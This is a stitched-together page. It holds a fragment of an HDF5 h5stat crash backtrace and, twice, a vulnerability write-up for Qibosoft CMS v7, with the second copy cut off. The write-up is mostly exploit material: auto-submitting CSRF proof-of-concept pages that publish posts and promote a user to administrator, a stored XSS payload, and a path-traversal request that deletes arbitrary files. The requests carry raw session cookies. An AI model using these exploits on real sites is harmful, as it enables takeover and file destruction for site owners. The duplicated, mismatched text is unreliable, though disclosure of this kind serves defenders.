    #15 0x0000555555563727 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe308) at /home/zxq/CVE_testing/source/hdf5/tools/src/h5stat/h5stat.c:1795
    #16 0x00007ffff7c930b3 in __libc_start_main (main=0x555555562f20 <main>, argc=0x2, argv=0x7fffffffe308, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffe2f8) at ../csu/libc-start.c:308
    #17 0x0000555555563a3e in _start ()

CVE-2021-45829: segmentation fault in h5stat · Issue #1317 · HDFGroup/hdf5

An issue in /admin/index.php?lfj=mysql&action=del of Qibosoft v7 allows attackers to arbitrarily delete files.

**Foreword**

The csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, I’ll show you a few problems caused by CSRF combined with other background vulnerabilities.  
if you want to reproduce these vuls , please go to qisoft and download “齐博CMS整站系统v7”

**0x01 CSRF in publishing articles**

position: /member/post.php?job=postnew&step=post

a normal http request like this:

    POST /qibo7/member/post.php?job=postnew&step=post HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1005
    Connection: close
    Referer: http://localhost:8123/qibo7/member/post.php?job=postnew&only=1&mid=0
    Cookie: USR=faol4ey2%091%091571797336%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fupfile.php%3Ffn%3Duppic%26dir%3Darticle%2F%26ISone%3D1; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201571799136084%7D; __51cke__=; __51laig__=42; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774
    Upgrade-Insecure-Requests: 1
    
    fid=4&postdb%5Btitle%5D=ceshi2&postdb%5Btitlecolor%5D=ceshi&postdb%5Bfonttype%5D=1&postdb%5Bforbidcomment%5D=1&postdb%5Bkeywords%5D=ceshi&select2=&postdb%5Bauthor%5D=&postdb%5Bcopyfrom%5D=&select=&postdb%5Bcopyfromurl%5D=&postdb%5Bpicurl%5D=&postdb%5Bautomakesmall%5D=1&picWidth=300&picHeight=225&postdb%5Bdescription%5D=&postdb%5Byz%5D=1&PageNum=3000&postdb%5Bcontent%5D=1233333323%3Cbr+%2F%3E%0D%0A&Submit=+%E6%8F%90+%E4%BA%A4+&postdb%5Bbak_id%5D=&mid=0&i_id=&aid=0&rid=&only=1&postdb%5Bsmalltitle%5D=&postdb%5Bhtmlname%5D=&postdb%5Btpl%5D%5Bhead%5D=&postdb%5Btpl%5D%5Bfoot%5D=&postdb%5Btpl%5D%5Bbencandy%5D=&postdb%5Bstyle%5D=&postdb%5Bposttime%5D=&postdb%5Bbegintime%5D=&postdb%5Bendtime%5D=&postdb%5Bhits%5D=&postdb%5Bpasswd%5D=&postdb%5Bmoney%5D=&postdb%5Bsubhead%5D=&vote_db%5Bname%5D=&vote_db%5Btype%5D=1&vote_db%5Blimittime%5D=&vote_db%5Blimitip%5D=0&vote_db%5Bforbidguestvote%5D=0&vote_db%5Bbegintime%5D=&vote_db%5Bendtime%5D=&vote_db%5Babout%5D=&vote_db%5Bvotetype%5D=0&textfield=1&hiddenField=0
    

from the request, we can find that there is not a csrf token, besides, the app does not check the referer.Then, we can generate a csrf poc like the one below by burpsuite:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form id="csrf" action="http://localhost:8123/qibo7/member/post.php?job=postnew&step=post" method="POST">
          <input type="hidden" name="fid" value="4" />
          <input type="hidden" name="postdb&#91;title&#93;" value="you have been hacked" />
          <input type="hidden" name="postdb&#91;titlecolor&#93;" value="ceshi" />
          <input type="hidden" name="postdb&#91;fonttype&#93;" value="1" />
          <input type="hidden" name="postdb&#91;forbidcomment&#93;" value="1" />
          <input type="hidden" name="postdb&#91;keywords&#93;" value="ceshi" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="postdb&#91;author&#93;" value="" />
          <input type="hidden" name="postdb&#91;copyfrom&#93;" value="" />
          <input type="hidden" name="select" value="" />
          <input type="hidden" name="postdb&#91;copyfromurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;picurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;automakesmall&#93;" value="1" />
          <input type="hidden" name="picWidth" value="300" />
          <input type="hidden" name="picHeight" value="225" />
          <input type="hidden" name="postdb&#91;description&#93;" value="" />
          <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
          <input type="hidden" name="PageNum" value="3000" />
          <input type="hidden" name="postdb&#91;content&#93;" value="1233333323&lt;br&#32;&#47;&gt;&#13;&#10;" />
          <input type="hidden" name="Submit" value="&#32;æ&#143;&#144;&#32;äº&#164;&#32;" />
          <input type="hidden" name="postdb&#91;bak&#95;id&#93;" value="" />
          <input type="hidden" name="mid" value="0" />
          <input type="hidden" name="i&#95;id" value="" />
          <input type="hidden" name="aid" value="0" />
          <input type="hidden" name="rid" value="" />
          <input type="hidden" name="only" value="1" />
          <input type="hidden" name="postdb&#91;smalltitle&#93;" value="" />
          <input type="hidden" name="postdb&#91;htmlname&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;head&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;foot&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;bencandy&#93;" value="" />
          <input type="hidden" name="postdb&#91;style&#93;" value="" />
          <input type="hidden" name="postdb&#91;posttime&#93;" value="" />
          <input type="hidden" name="postdb&#91;begintime&#93;" value="" />
          <input type="hidden" name="postdb&#91;endtime&#93;" value="" />
          <input type="hidden" name="postdb&#91;hits&#93;" value="" />
          <input type="hidden" name="postdb&#91;passwd&#93;" value="" />
          <input type="hidden" name="postdb&#91;money&#93;" value="" />
          <input type="hidden" name="postdb&#91;subhead&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;name&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;type&#93;" value="1" />
          <input type="hidden" name="vote&#95;db&#91;limittime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;limitip&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;forbidguestvote&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;begintime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;endtime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;about&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;votetype&#93;" value="0" />
          <input type="hidden" name="textfield" value="1" />
          <input type="hidden" name="hiddenField" value="0" />
        </form>
        <script>
            var poc = document.getElementById("csrf");
            poc.submit()
        </script>
      </body>
    </html>
    
    

attacker just need to save the poc as a html and put it on his web server, then send the evil url to another users ,If the user clicks the evil url when logged into the system, he will publish an article(and the article title is defind in the poc) without his knowledge.Now, I will show you the details. I login admin account locally:

and I try to request the evil url(http://localhost/test/csrf\_poc1.php), then when we back to the index.php we will find that one more article is published with title “you have been hacked”!

**0x02 CSRF to Privilege Escalation (add an super administrator)**

position: /admin/index.php?lfj=member&action=editmember

normal request(change user “axin” to administrator):

    POST /qibo7/admin/index.php?lfj=member&action=editmember HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 633
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=member&job=editmember&uid=2
    Cookie: USR=faol4ey2%096%091571798905%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fregfield.php%3Fjob%3Dreg%26uid%3D2%260.20012388446694007; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Busername%5D=axin&postdb%5Bpassword%5D=5f4dcc3b5aa765d61d8327deb882cf99&postdb%5Bnewpassword%5D=&postdb%5Bgroupid%5D=3&ConfigDB%5Bendtime%5D=&postdb%5Bemail%5D=770284144%40qq.com&postdb%5Bicon%5D=&picWidth=150&picHeight=150&postdb%5Bmoney%5D=5&postdb%5Btotalspace%5D=0&postdb%5Boltime%5D=13226&postdb%5Bsex%5D=0&postdb%5Byz%5D=1&postdb%5Bintroduce%5D=&postdb%5Boicq%5D=&postdb%5Bmsn%5D=&postdb%5Bhomepage%5D=&postdb%5Baddress%5D=&postdb%5Bpostalcode%5D=&postdb%5Btelephone%5D=&postdb%5Bmobphone%5D=&postdb%5Bidcard%5D=&postdb%5Btruename%5D=&email_yz=0&mob_yz=0&idcard_yz=0&Submit=%E4%BF%AE+%E6%94%B9&uid=2&postdb%5Bhits%5D2=2
    

then, we can generate a csrf poc by burpsuite:

    <html>
    
    <body>
    <script>history.pushState('', '', '/')</script>
    <form id="csrf" action="http://localhost:8123/qibo7/admin/index.php?lfj=member&action=editmember" method="POST">
        <input type="hidden" name="postdb&#91;username&#93;" value="axin" />
        <input type="hidden" name="postdb&#91;password&#93;" value="5f4dcc3b5aa765d61d8327deb882cf99" />
        <input type="hidden" name="postdb&#91;newpassword&#93;" value="" />
        <input type="hidden" name="postdb&#91;groupid&#93;" value="3" />
        <input type="hidden" name="ConfigDB&#91;endtime&#93;" value="" />
        <input type="hidden" name="postdb&#91;email&#93;" value="770284144&#64;qq&#46;com" />
        <input type="hidden" name="postdb&#91;icon&#93;" value="" />
        <input type="hidden" name="picWidth" value="150" />
        <input type="hidden" name="picHeight" value="150" />
        <input type="hidden" name="postdb&#91;money&#93;" value="5" />
        <input type="hidden" name="postdb&#91;totalspace&#93;" value="0" />
        <input type="hidden" name="postdb&#91;oltime&#93;" value="13226" />
        <input type="hidden" name="postdb&#91;sex&#93;" value="0" />
        <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
        <input type="hidden" name="postdb&#91;introduce&#93;" value="" />
        <input type="hidden" name="postdb&#91;oicq&#93;" value="" />
        <input type="hidden" name="postdb&#91;msn&#93;" value="" />
        <input type="hidden" name="postdb&#91;homepage&#93;" value="" />
        <input type="hidden" name="postdb&#91;address&#93;" value="" />
        <input type="hidden" name="postdb&#91;postalcode&#93;" value="" />
        <input type="hidden" name="postdb&#91;telephone&#93;" value="" />
        <input type="hidden" name="postdb&#91;mobphone&#93;" value="" />
        <input type="hidden" name="postdb&#91;idcard&#93;" value="" />
        <input type="hidden" name="postdb&#91;truename&#93;" value="" />
        <input type="hidden" name="email&#95;yz" value="0" />
        <input type="hidden" name="mob&#95;yz" value="0" />
        <input type="hidden" name="idcard&#95;yz" value="0" />
        <input type="hidden" name="Submit" value="ä&#191;&#174;&#32;æ&#148;&#185;" />
        <input type="hidden" name="uid" value="2" />
        <input type="hidden" name="postdb&#91;hits&#93;2" value="2" />
        <input type="submit" value="Submit request" />
    </form>
    <script>
        var poc = document.getElementById("csrf");
        poc.submit()
    </script>
    </body>
    </html>
    

the poc is to change user “axin” to administrator, if you want to reproduce the attack, you should register a common user first, and then generate csrf poc yourself.

from the picture below , we can see that the user axin is just a common user.  

but after the admin click the evil url, the user axin will be admin !!

**0x03 Stored XSS in background**

position:/admin/index.php?lfj=friendlink&action=add  
request:

    POST /qibo7/admin/index.php?lfj=friendlink&action=add HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 283
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=friendlink&job=add
    Cookie: USR=faol4ey2%091%091571805064%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dfriendlink%26job%3Dadd; __tins__20133593=%7B%22sid%22%3A%201571802713278%2C%20%22vd%22%3A%204%2C%20%22expires%22%3A%201571805446751%7D; __51cke__=; __51laig__=47; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Bname%5D=axin&postdb%5Bfid%5D=2&postdb%5Burl%5D=%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E&postdb%5Blogo%5D=&postdb%5Bdescrip%5D=&postdb%5Bifhide%5D=0&postdb%5Byz%5D=1&postdb%5Biswordlink%5D=0&postdb%5Bendtime%5D=&Submit=%E6%8F%90%E4%BA%A4%E6%95%B0%E6%8D%AE&id=
    

No dangerous characters are escaped， so we can insert our payload like below:  
"><script>alert(1);</script>  

  
  
of course, we can also combine the xss with the csrf to do more !

**0x04 Arbitrary File Deletion in background**

position:/admin/index.php?lfj=mysql&action=del

poc:

    POST /qibo7/admin/index.php?lfj=mysql&action=del HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 63
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=mysql&job=del
    Cookie: USR=faol4ey2%091%091571799626%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fadmin%2Findex.php%3Flfj%3Dmysql%26job%3Ddel; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Admin=2%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=V29XS10LbVNSA1EBBgNVBwBXUQQNXQEBVF4GBVNcUlZdXgRQUlxd14a26ee802
    Upgrade-Insecure-Requests: 1
    
    baktime=../test.php&Submit=%E5%88%A0%E9%99%A4%E6%95%B0%E6%8D%AE
    

The problem occurred when the backup database was deleted， we can control the parameter “baktime”, and we can use ../ to achieve directory traversal purpose, so we can delete some web pages.I will show you details next.

firstly, create a file named axin.php in the root path of the application like below

and then send our payload

now, the file axin.php created just now has been deleted!

of course, we can also combine the vul with csrf to do more !

CVE-2020-20944: some vulnerabilities in qibosoft(齐博CMS整站系统v7)_tnt阿信的博客-CSDN博客

Qibosoft v7 contains a stored cross-site scripting (XSS) vulnerability in the component /admin/index.php?lfj=friendlink&action=add.

![](https://img-blog.csdnimg.cn/20200708203502702.gif#pic_center)

**Foreword**

The csrf vulnerabilities exists almost everywhere in the application. Due to a number of background vulnerabilities, just with a few tricks, an attacker can take over the application. Next, I’ll show you a few problems caused by CSRF combined with other background vulnerabilities.  
if you want to reproduce these vuls , please go to qisoft and download “齐博CMS整站系统v7”

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023130316593.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x01 CSRF in publishing articles**

position: /member/post.php?job=postnew&step=post

a normal http request like this:

    POST /qibo7/member/post.php?job=postnew&step=post HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1005
    Connection: close
    Referer: http://localhost:8123/qibo7/member/post.php?job=postnew&only=1&mid=0
    Cookie: USR=faol4ey2%091%091571797336%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fupfile.php%3Ffn%3Duppic%26dir%3Darticle%2F%26ISone%3D1; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%202%2C%20%22expires%22%3A%201571799136084%7D; __51cke__=; __51laig__=42; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774
    Upgrade-Insecure-Requests: 1
    
    fid=4&postdb%5Btitle%5D=ceshi2&postdb%5Btitlecolor%5D=ceshi&postdb%5Bfonttype%5D=1&postdb%5Bforbidcomment%5D=1&postdb%5Bkeywords%5D=ceshi&select2=&postdb%5Bauthor%5D=&postdb%5Bcopyfrom%5D=&select=&postdb%5Bcopyfromurl%5D=&postdb%5Bpicurl%5D=&postdb%5Bautomakesmall%5D=1&picWidth=300&picHeight=225&postdb%5Bdescription%5D=&postdb%5Byz%5D=1&PageNum=3000&postdb%5Bcontent%5D=1233333323%3Cbr+%2F%3E%0D%0A&Submit=+%E6%8F%90+%E4%BA%A4+&postdb%5Bbak_id%5D=&mid=0&i_id=&aid=0&rid=&only=1&postdb%5Bsmalltitle%5D=&postdb%5Bhtmlname%5D=&postdb%5Btpl%5D%5Bhead%5D=&postdb%5Btpl%5D%5Bfoot%5D=&postdb%5Btpl%5D%5Bbencandy%5D=&postdb%5Bstyle%5D=&postdb%5Bposttime%5D=&postdb%5Bbegintime%5D=&postdb%5Bendtime%5D=&postdb%5Bhits%5D=&postdb%5Bpasswd%5D=&postdb%5Bmoney%5D=&postdb%5Bsubhead%5D=&vote_db%5Bname%5D=&vote_db%5Btype%5D=1&vote_db%5Blimittime%5D=&vote_db%5Blimitip%5D=0&vote_db%5Bforbidguestvote%5D=0&vote_db%5Bbegintime%5D=&vote_db%5Bendtime%5D=&vote_db%5Babout%5D=&vote_db%5Bvotetype%5D=0&textfield=1&hiddenField=0
    

from the request, we can find that there is not a csrf token, besides, the app does not check the referer.Then, we can generate a csrf poc like the one below by burpsuite:

    <html>
      
      <body>
      <script>history.pushState('', '', '/')</script>
        <form id="csrf" action="http://localhost:8123/qibo7/member/post.php?job=postnew&step=post" method="POST">
          <input type="hidden" name="fid" value="4" />
          <input type="hidden" name="postdb&#91;title&#93;" value="you have been hacked" />
          <input type="hidden" name="postdb&#91;titlecolor&#93;" value="ceshi" />
          <input type="hidden" name="postdb&#91;fonttype&#93;" value="1" />
          <input type="hidden" name="postdb&#91;forbidcomment&#93;" value="1" />
          <input type="hidden" name="postdb&#91;keywords&#93;" value="ceshi" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="postdb&#91;author&#93;" value="" />
          <input type="hidden" name="postdb&#91;copyfrom&#93;" value="" />
          <input type="hidden" name="select" value="" />
          <input type="hidden" name="postdb&#91;copyfromurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;picurl&#93;" value="" />
          <input type="hidden" name="postdb&#91;automakesmall&#93;" value="1" />
          <input type="hidden" name="picWidth" value="300" />
          <input type="hidden" name="picHeight" value="225" />
          <input type="hidden" name="postdb&#91;description&#93;" value="" />
          <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
          <input type="hidden" name="PageNum" value="3000" />
          <input type="hidden" name="postdb&#91;content&#93;" value="1233333323&lt;br&#32;&#47;&gt;&#13;&#10;" />
          <input type="hidden" name="Submit" value="&#32;æ&#143;&#144;&#32;äº&#164;&#32;" />
          <input type="hidden" name="postdb&#91;bak&#95;id&#93;" value="" />
          <input type="hidden" name="mid" value="0" />
          <input type="hidden" name="i&#95;id" value="" />
          <input type="hidden" name="aid" value="0" />
          <input type="hidden" name="rid" value="" />
          <input type="hidden" name="only" value="1" />
          <input type="hidden" name="postdb&#91;smalltitle&#93;" value="" />
          <input type="hidden" name="postdb&#91;htmlname&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;head&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;foot&#93;" value="" />
          <input type="hidden" name="postdb&#91;tpl&#93;&#91;bencandy&#93;" value="" />
          <input type="hidden" name="postdb&#91;style&#93;" value="" />
          <input type="hidden" name="postdb&#91;posttime&#93;" value="" />
          <input type="hidden" name="postdb&#91;begintime&#93;" value="" />
          <input type="hidden" name="postdb&#91;endtime&#93;" value="" />
          <input type="hidden" name="postdb&#91;hits&#93;" value="" />
          <input type="hidden" name="postdb&#91;passwd&#93;" value="" />
          <input type="hidden" name="postdb&#91;money&#93;" value="" />
          <input type="hidden" name="postdb&#91;subhead&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;name&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;type&#93;" value="1" />
          <input type="hidden" name="vote&#95;db&#91;limittime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;limitip&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;forbidguestvote&#93;" value="0" />
          <input type="hidden" name="vote&#95;db&#91;begintime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;endtime&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;about&#93;" value="" />
          <input type="hidden" name="vote&#95;db&#91;votetype&#93;" value="0" />
          <input type="hidden" name="textfield" value="1" />
          <input type="hidden" name="hiddenField" value="0" />
        </form>
        <script>
            var poc = document.getElementById("csrf");
            poc.submit()
        </script>
      </body>
    </html>
    
    

attacker just need to save the poc as a html and put it on his web server, then send the evil url to another users ,If the user clicks the evil url when logged into the system, he will publish an article(and the article title is defind in the poc) without his knowledge.Now, I will show you the details. I login admin account locally:

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023120247906.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

and I try to request the evil url(http://localhost/test/csrf\_poc1.php), then when we back to the index.php we will find that one more article is published with title “you have been hacked”!

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023120926730.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

**0x02 CSRF to Privilege Escalation (add an super administrator)**

position: /admin/index.php?lfj=member&action=editmember

normal request(change user “axin” to administrator):

    POST /qibo7/admin/index.php?lfj=member&action=editmember HTTP/1.1
    Host: localhost:8123
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 633
    Connection: close
    Referer: http://localhost:8123/qibo7/admin/index.php?lfj=member&job=editmember&uid=2
    Cookie: USR=faol4ey2%096%091571798905%09http%3A%2F%2Flocalhost%3A8123%2Fqibo7%2Fdo%2Fregfield.php%3Fjob%3Dreg%26uid%3D2%260.20012388446694007; __tins__20133593=%7B%22sid%22%3A%201571797312008%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201571799269555%7D; __51cke__=; __51laig__=43; Admin=1%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1571738330; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1571738742; passport=1%09admin%09AgIFAABRVlMDWQNWAg1WV1RUWgACDl0HVg8OA1dVXAk%3D940a495774; adminID=CDtWAVhaCDkAVQwCWgdXB1ZQWAdUB1BQVFVZA1cOAlVbCg9XVlVfCQ%3D%3D8991c7cf95
    Upgrade-Insecure-Requests: 1
    
    postdb%5Busername%5D=axin&postdb%5Bpassword%5D=5f4dcc3b5aa765d61d8327deb882cf99&postdb%5Bnewpassword%5D=&postdb%5Bgroupid%5D=3&ConfigDB%5Bendtime%5D=&postdb%5Bemail%5D=770284144%40qq.com&postdb%5Bicon%5D=&picWidth=150&picHeight=150&postdb%5Bmoney%5D=5&postdb%5Btotalspace%5D=0&postdb%5Boltime%5D=13226&postdb%5Bsex%5D=0&postdb%5Byz%5D=1&postdb%5Bintroduce%5D=&postdb%5Boicq%5D=&postdb%5Bmsn%5D=&postdb%5Bhomepage%5D=&postdb%5Baddress%5D=&postdb%5Bpostalcode%5D=&postdb%5Btelephone%5D=&postdb%5Bmobphone%5D=&postdb%5Bidcard%5D=&postdb%5Btruename%5D=&email_yz=0&mob_yz=0&idcard_yz=0&Submit=%E4%BF%AE+%E6%94%B9&uid=2&postdb%5Bhits%5D2=2
    

then, we can generate a csrf poc by burpsuite:

    <html>
    
    <body>
    <script>history.pushState('', '', '/')</script>
    <form id="csrf" action="http://localhost:8123/qibo7/admin/index.php?lfj=member&action=editmember" method="POST">
        <input type="hidden" name="postdb&#91;username&#93;" value="axin" />
        <input type="hidden" name="postdb&#91;password&#93;" value="5f4dcc3b5aa765d61d8327deb882cf99" />
        <input type="hidden" name="postdb&#91;newpassword&#93;" value="" />
        <input type="hidden" name="postdb&#91;groupid&#93;" value="3" />
        <input type="hidden" name="ConfigDB&#91;endtime&#93;" value="" />
        <input type="hidden" name="postdb&#91;email&#93;" value="770284144&#64;qq&#46;com" />
        <input type="hidden" name="postdb&#91;icon&#93;" value="" />
        <input type="hidden" name="picWidth" value="150" />
        <input type="hidden" name="picHeight" value="150" />
        <input type="hidden" name="postdb&#91;money&#93;" value="5" />
        <input type="hidden" name="postdb&#91;totalspace&#93;" value="0" />
        <input type="hidden" name="postdb&#91;oltime&#93;" value="13226" />
        <input type="hidden" name="postdb&#91;sex&#93;" value="0" />
        <input type="hidden" name="postdb&#91;yz&#93;" value="1" />
        <input type="hidden" name="postdb&#91;introduce&#93;" value="" />
        <input type="hidden" name="postdb&#91;oicq&#93;" value="" />
        <input type="hidden" name="postdb&#91;msn&#93;" value="" />
        <input type="hidden" name="postdb&#91;homepage&#93;" value="" />
        <input type="hidden" name="postdb&#91;address&#93;" value="" />
        <input type="hidden" name="postdb&#91;postalcode&#93;" value="" />
        <input type="hidden" name="postdb&#91;telephone&#93;" value="" />
        <input type="hidden" name="postdb&#91;mobphone&#93;" value="" />
        <input type="hidden" name="postdb&#91;idcard&#93;" value="" />
        <input type="hidden" name="postdb&#91;truename&#93;" value="" />
        <input type="hidden" name="email&#95;yz" value="0" />
        <input type="hidden" name="mob&#95;yz" value="0" />
        <input type="hidden" name="idcard&#95;yz" value="0" />
        <input type="hidden" name="Submit" value="ä&#191;&#174;&#32;æ&#148;&#185;" />
        <input type="hidden" name="uid" value="2" />
        <input type="hidden" name="postdb&#91;hits&#93;2" value="2" />
        <input type="submit" value="Submit request" />
    </form>
    <script>
        var poc = document.getElementById("csrf");
        poc.submit()
    </script>
    </body>
    </html>
    

the poc is to change user “axin” to administrator, if you want to reproduce the attack, you should register a common user first, and then generate csrf poc yourself.

from the picture below , we can see that the user axin is just a common user.  
![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023121948917.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

but after the admin click the evil url, the user axin will be admin !!

![在这里插入图片描述](https://img-blog.csdnimg.cn/20191023122628335.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2hlX2FuZA==,size_16,color_FFFFFF,t_70)

